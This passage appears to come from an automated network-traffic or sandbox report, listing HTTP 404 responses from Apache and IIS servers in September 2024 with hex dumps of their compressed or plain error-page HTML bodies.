62 75 6d 70 73 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 30 20 32 37 35 2e 32 73 38 33 2e 38 2d 32 38 20 31 38 30 2d 32 38 20 31 39 37 20 32 38 20 31 39 37 20 32 38 48 30 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 33 37 37 20 32 37 35 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 33 37 37 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 36 32 33 2e 32 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31 37 39 2e 39 2d 32 38 20 31 39 36 2e 39 20 32 38 20 31
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:52:08 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4837Content-Type: text/html; charset=utf-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5c ff 77 1b 45 92 ff f9 f8 2b fa 4c 40 32 48 1a 49 56 64 d9 96 cd 2a b2 fc 85 d8 96 91 e4 84 1c c9 e9 b5 66 5a d2 e0 d1 f4 30 d3 b2 ad 84 bc 07 77 bb c0 de 25 04 16 8e 4d ee e0 b8 c0 7b 84 07 b7 c9 de ee 1e b0 40 b8 7f 26 72 9c 9f ee 5f b8 ea d1 b7 d1 4c 4b 16 0a c8 bb 37 7e b6 35 3d d5 d5 9f aa ae aa ae 6a cd 4c f2 6f 97 b3 e9 c2 85 ed 0c aa b2 9a b6 f4 44 b2 f3 8f 60 65 e9 09 04 47 b2 46 18 46 72 15 9b 16 61 8b 53 3b 85 95 60 62 aa 7d 89 a9 4c 23 4b 0f ff f8 dd c3 ef 3e 6e de 78 f7 e1 fb 1f 3f 7a ff d6 d1 bd 7b 49 a9 75 c5 c1 40 c7 35 b2 38 65 d2 12 65 d6 14 92 a9 ce 88 0e ec 74 aa ea 0a 39 08 e8 b4 4c 35 8d ee 4f 21 a9 dd cb 62 8d 0e 07 7e 48 cf a0 33 d8 22 e8 19 a9 db 54 a2 4a 03 5d e9 9e f2 43 a6 1a 35 e7 d1 93 33 33 33 0b 7d 17 ca 30 e0 3c 8a c4 8d 03 74 8e 98 0a d6 71 00 4d ad 11 6d 8f 30 55 c6 68 8b d4 c9 54 00 55 3b 0d 01 94 32 55 ac 05 90 6f 53 95 4d 6a d1 32 43 17 f0 1a 51 7d 01 64 61 dd 0a 5a c4 54 cb fd 43 d4 b0 59 51 f5 79 14 ee 6f 36 b0 a2 a8 7a 05 da 51 34 0c c3 f3 3f 3d 8a ab dd 4f d5 c8 15 21 bb 08 ef 14 76 73 e5 f2 04 2d f5 32 99 47 d1 84 93 61 f7 e2 3e 51 2b 55 90 f9 74 d8 d5 55 53 75 12 ac b6 af ce 44 07 a0 89 8a 15 1b 8b 26 12 32 19 32 5c cc 3d 5c 57 7e ae fb b0 58 65 f1 63 44 8c 78 44 2c 51 53 21 66 10 ac 89 d1 1a 10 00 03 8b 6a aa 82 9e 24 84 08 05 9a 19 a0 de a8 50 7b ed 71 e3 43 55 5b a2 9a 22 1a 0b 97 4a a6 4b 7d 75 d3 e2 fa 03 03 33 fa 19 32 72 c0 82 0a 91 a9 89 99 4a 01 50 1d fc c1 e4 73 34 94 2e 68 bb c7 3c 52 40 01 44 0c 42 3c 81 89 38 ff 59 10 a2 33 c0 19 19 31 85 dc e6 ab 74 8f b8 a4 1a 05 7b 8f 45 c8 36 3c 62 9a d4 c5 a6 84 e5 dd 8a 49 a1 33 e0 2b 27 e4 92 5c 72 f6 ef 31 20 72 95 22 86 4b 1a 71 b9 fd be aa b0 2a 77 95 f0 53 43 7a 1a a6 bb 5f d7 36 bd 13 cd a5 2d 43 40 9a 47 b8 ce e8 40 0b 49 9c 7e 6a 88 77 45 42 b1 d3 0b 03 64 0d 76 66 a4 3c cb 7f 44 e6 ed 89 25 6d ab 37 b1 a2 d6 2d 70 5e a1 75 96 71 4d d5 1a f3 28 4d 75 70 09 6c 41 a0 db 50 4b a4 35 47 68 93 ea 14 22 dd 26 d1 35 1a 00 9a ba a9 12 33 80 6a d0 6c 19 58 26 c7 e8 6f 69 98 16 07 78 77 d8 6d 0d ce a0 9e 39 90 89 61 23 5b d7 cb d4 19 de 43 a4 7b 49 e4 ba 41 46 8d f9 81 d1 d4 d1 39 54 23 96 85 2b 64 d0 d4 7b 02 40 47 f9 8e a0 a2 28 8a 70 26 3a f1 27 8c 74 ea f6 d8 7e 4b 10 07 69 db 88 bc c6 d7 e6 0e 12 06 35 52 66 dd 09 8f 0d 21 34 f9 40 83 29 c5 a6 e1 b5 8c 8e 45 74 56 c9 a9 e6 0f 77 8f ee df 7b f4 6f bf 7a f4 dd bb 53 03 ac a3 a7 6b 99 2a 2e 45 83 13 61 50 00 97 43 10 d1 b0 a6 56 c0 44 64 d2 1f 78 f8 d1 f5 8f b2 70 a1 6d 09 2c 9a bf 21 5e ed 72 20 af 3e 9d a1 68 6e 6e ee 38 d3 b2 40 5b 32 09 7a a5 76 ae 7a a3 59 d7 90 90 38 c7 7f c4 e1 29 78 d0 09 50 a3 23 e5 2e 2c 5e 0c 3d 9e 7a 0c 17 44 b5 63 19 f1 63 58 f6 a0 a8 96 a1 61 30 4a 55 b7 3d a6 a4 51 79 d7 35 e1 30 db c2 10 df d2 e7 01 77
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:52:11 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4860Content-Type: text/html; charset=utf-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5c ff 77 db 46 72 ff b9 fe 2b b6 8c 13 52 09 09 90 d4 37 4a a2 94 d2 14 25 d1 91 44 99 a4 6c eb 62 97 0f 04 96 24 22 10 0b 03 4b 51 b2 e3 f7 92 f6 2e c9 b5 76 9c 5c d2 9c dd 26 cd 39 79 2f c9 4b 7a f6 f5 ae 4d 72 49 9c fe 33 a6 2c ff d4 7f a1 b3 e0 37 10 58 52 34 9d 50 77 85 9e 24 62 31 3b fb 99 d9 99 d9 99 25 80 f8 df 2e 67 92 f9 9d ad 14 aa d0 aa b6 74 2a de fe 87 25 65 e9 14 82 23 5e c5 54 42 72 45 32 2d 4c 17 7d db f9 95 50 cc d7 ba 44 55 aa e1 a5 47 7f fa fe d1 f7 1f 37 6e bd fb e8 fd 8f 1f bf 7f e7 e8 fe fd b8 d8 bc e2 60 a0 4b 55 bc e8 33 49 91 50 cb 87 64 a2 53 ac 03 3b 9d a8 ba 82 f7 83 3a 29 11 4d 23 75 1f 12 5b bd 2c 7a d0 e6 c0 0e f1 79 74 46 b2 30 7a 5e ec 34 15 89 72 80 ae 75 4e d9 21 13 8d 98 f3 e8 99 c9 c9 c9 85 9e 0b 25 18 70 1e 45 66 8c 7d 74 1e 9b 8a a4 4b 41 e4 5b c3 da 1e a6 aa 2c a1 4d 5c c3 be 20 aa b4 1b 82 28 61 aa 92 16 44 fe 0d 55 36 89 45 4a 14 ed 48 6b 58 f5 07 91 25 e9 56 c8 c2 a6 5a ea 1d a2 2a 99 65 55 9f 47 e1 de 66 43 52 14 55 2f 43 3b 8a 86 61 78 f6 a7 4b 71 bd f3 a9 12 b9 c6 65 17 61 9d c2 6e ae 4c 9e 90 a5 5e c5 f3 28 1a 73 32 ec 5c ac 63 b5 5c 01 99 a7 c3 ae ae 9a aa e3 50 a5 75 75 32 da 07 4d 94 af d8 a9 68 2c 26 e3 01 c3 4d b9 87 eb c8 cf 74 1f e6 ab 6c e6 18 11 23 1e 11 8b c4 54 b0 19 02 6b a2 a4 0a 04 c0 c0 22 9a aa a0 67 30 c6 5c 81 26 fb a8 37 ca d5 5e 6b dc 99 81 aa 2d 12 4d e1 8d 25 15 8b a6 4b 7d 35 d3 62 fa 03 03 33 7a 19 52 bc 4f 43 0a 96 89 29 51 95 00 a0 1a f8 83 c9 e6 68 20 5d c8 76 8f 79 a4 80 02 30 1f 04 7f 02 63 33 ec 67 81 8b ce 00 67 a4 d8 e4 72 9b af 90 3d ec 92 6a 18 ec 5d 16 82 6d 78 d8 34 89 8b 4d 51 92 77 cb 26 81 ce 80 af 14 93 8b 72 d1 d9 bf cb 00 cb 15 82 a8 54 d4 b0 cb ed eb aa 42 2b cc 55 c2 cf 0e e8 69 98 ee 7e 1d db f4 4e 34 93 b6 04 01 69 1e 49 35 4a fa 5a 48 6c fa d9 01 de 15 11 a6 a6 17 fa c8 1a 6a cf 48 69 96 fd f0 cc db 13 4b 5a 56 6f 4a 8a 5a b3 c0 79 b9 d6 59 92 aa aa 76 30 8f 92 44 07 97 90 2c 08 74 eb 6a 11 37 e7 08 6d 10 9d 40 a4 db c0 ba 46 82 40 53 33 55 6c 06 51 15 9a 2d 43 92 f1 31 fa 5b 1a a4 c5 3e de 1d 76 5b 83 33 a8 a7 f6 65 6c d8 c8 d2 7a 89 38 c3 bb 80 3b 97 78 ae 1b a2 c4 98 ef 1b 4d 1d 9d 85 2a b6 2c a9 8c fb 4d bd 27 00 b4 95 ef 08 2a 8a a2 70 67 a2 1d 7f c2 48 27 6e 8f ed b5 04 7e 90 b6 8d c8 6b 7c 2d ee 20 61 48 c3 25 da 99 f0 a9 01 84 26 1b a8 3f 25 df 34 bc 96 d1 b6 88 f6 2a e9 6b fc 78 ef e8 c1 fd c7 ff f6 ab c7 df bf eb eb 63 1d 5d 5d cb 44 71 29 1a 9c 48 02 05 30 39 38 11 4d d2 d4 32 98 88 8c 7b 03 0f 3b 3a fe 51 e2 2e b4 4d 81 79 f3 37 c0 ab 5d 0e e4 d5 a7 33 14 cd cd cd 1d 67 5a 16 68 4b c6 21 af d4 ce 55 6f 38 eb 1a 10 12 e7 d8 0f 3f 3c 85 f6 db 01 6a 78 a4 cc 85 f9 8b a1 c7 53 8f e1 82 88 76 2c 23 76 0c ca 1e 14 d5 32 34 09 8c 52 d5 6d 8f 29 6a 44 de 75 4d 38 cc 36 37 c4 37 f5 b9
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:52:13 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 5757Content-Type: text/html; charset=utf-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5c 7b 77 e3 c6 75 ff bb fe 14 53 65 63 49 b6 48 80 6f 52 d2 2a a5 28 8a a4 c4 97 f8 10 45 d9 ae 0e 08 0c 09 88 20 06 02 06 7c c8 de 73 92 36 b1 9d d6 eb b5 93 d4 b1 db a4 8e 9d 73 62 9f a4 59 a7 49 1b 3b 76 d6 fd 32 4b ed ee 5f fd 0a 9d 01 1f 02 49 90 92 b9 36 95 14 3a 92 88 c1 9d 3b bf 7b e7 de 3b f7 0e 01 6c fe ed 4e 26 52 28 67 a3 40 c4 0d 79 eb 99 cd c1 3f c8 09 5b cf 00 72 6c 36 20 e6 00 2f 72 9a 0e f1 ed a5 62 61 d7 11 5c ea 5f c2 12 96 e1 d6 a3 3f 7c f1 e8 8b f7 bb f7 de 7e f4 93 f7 9f fc e4 bd c7 9f 7c b2 c9 f4 ae 58 18 28 5c 03 de 5e d2 50 05 61 7d 09 f0 48 c1 50 21 ec 14 24 29 02 6c af 29 a8 8a 64 19 b5 96 00 d3 ef a5 e3 ce 80 03 3d 98 e7 c0 36 a7 43 f0 1c 33 6c aa 20 a1 03 5e 1e 9e d2 83 47 32 d2 d6 c1 b7 3c 1e cf c6 c8 85 2a 19 70 1d b8 fc 6a 1b 1c 42 4d e0 14 6e 0d 2c c5 a1 dc 84 58 e2 39 90 86 06 5c 5a 03 e2 a0 61 0d 84 35 89 93 d7 c0 72 4a e2 35 a4 a3 2a 06 65 2e 0e a5 e5 35 a0 73 8a ee d0 a1 26 55 47 87 68 70 5a 4d 52 d6 01 3b da ac 72 82 20 29 35 d2 0e dc 2c 19 9e fe b9 a4 b8 33 fc 24 ba 5e b6 65 e7 a2 9d d8 71 ae 54 1e 87 2e 9d c3 75 e0 0e 5a 19 0e 2f b6 a0 54 13 89 cc 3e 76 ac ab 2c 29 d0 21 f6 af 7a dc 53 d0 b8 ed 15 eb 75 07 83 3c 9c 31 9c 77 7c b8 a1 fc 54 f7 ac bd ca fc 57 88 e8 9a 10 b1 82 34 01 6a 0e 62 4d 18 35 08 01 61 a0 23 59 12 c0 b7 20 84 b6 02 79 a6 a8 d7 6d ab bd fe b8 fe 99 aa ad 20 59 b0 1b 8b ab 54 b4 31 f5 19 9a 4e f5 47 0c 4c 1d 65 88 61 1b 3b 04 c8 23 8d c3 12 22 80 0c e2 0f 1a 9d a3 99 74 0e d3 3d d6 81 40 14 00 ed 41 d8 4f 60 d0 4f 7f 36 6c d1 a9 c4 19 31 d4 6c b9 ad 8b a8 09 c7 a4 ba 0e f6 4b 16 4e d3 f0 a0 a6 a1 31 36 15 8e af d7 34 44 3a 13 7c d5 20 5f e1 2b d6 fe 97 0c 20 2f 22 80 b9 8a 0c c7 dc be 25 09 58 a4 ae c2 7e 7b 46 4f 55 1b ef 37 b4 cd c9 89 a6 d2 56 49 40 5a 07 9c 81 d1 54 0b 09 fa be 3d c3 bb 5c 4e af 6f 63 8a ac 8e c1 8c 54 03 f4 c7 ce bc 27 62 49 df ea 35 4e 90 0c 9d 38 af ad 75 56 b9 86 24 77 d6 41 04 29 c4 25 38 9d 04 ba a4 54 81 bd 39 02 29 a4 20 12 e9 52 50 91 d1 1a a1 31 34 09 6a 6b a0 41 9a 75 95 e3 e1 15 fa db 9a a5 c5 29 de cd 8e 5b 83 35 a8 47 db 3c 54 4d 64 09 a5 8a ac e1 dd 09 87 97 ec 5c d7 81 91 ba 3e 35 9a 5a 3a 3b 1b 50 d7 b9 1a 9c 36 f5 13 01 60 a0 7c 4b 50 11 04 c1 76 26 06 f1 87 05 0a 1a f7 d8 51 4b b0 0f d2 a6 11 4d 1a 5f 9f 3b 91 d0 21 c3 2a 1e 4e b8 77 06 a1 46 07 9a 4e 69 6f 1a 93 96 31 b0 88 c1 2a b9 d4 fd f2 fe e3 07 9f 3c f9 b7 1f 3c f9 e2 ed a5 29 d6 71 a9 6b 1e 09 63 8a 26 4e c4 11 05 50 39 6c 22 1a 27 4b 35 62 22 3c 1c 0d 3c f4 18 fa 47 d5 76 a1 ed 09 6c 37 7f 33 bc 7a cc 81 26 f5 69 0d 45 a1 50 e8 2a d3 d2 89 b6 78 e8 98 94 da ba ea 5d cf ba 66 84 c4 10 fd b1 0f 4f 8e f6 20 40 5d 1f 29 75 61 fb c5 70 c2 53 af e0 02 90 7c 25 23 7a cc ca 1e 04 49 57 65 8e 18 a5 a4 98 1e 53 91 11 5f 1f 9b 70 32 db
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:52:16 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e5 8f 91 e7 94 9f e9 94 99 e8 af af 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 36 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 62 62 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 68 65 6c 70 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 16 Sep 2024 07:41:01 GMTConnection: closeContent-Length: 4948Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 16 Sep 2024 07:41:04 GMTConnection: closeContent-Length: 4948Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 16 Sep 2024 07:41:06 GMTConnection: closeContent-Length: 4948Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 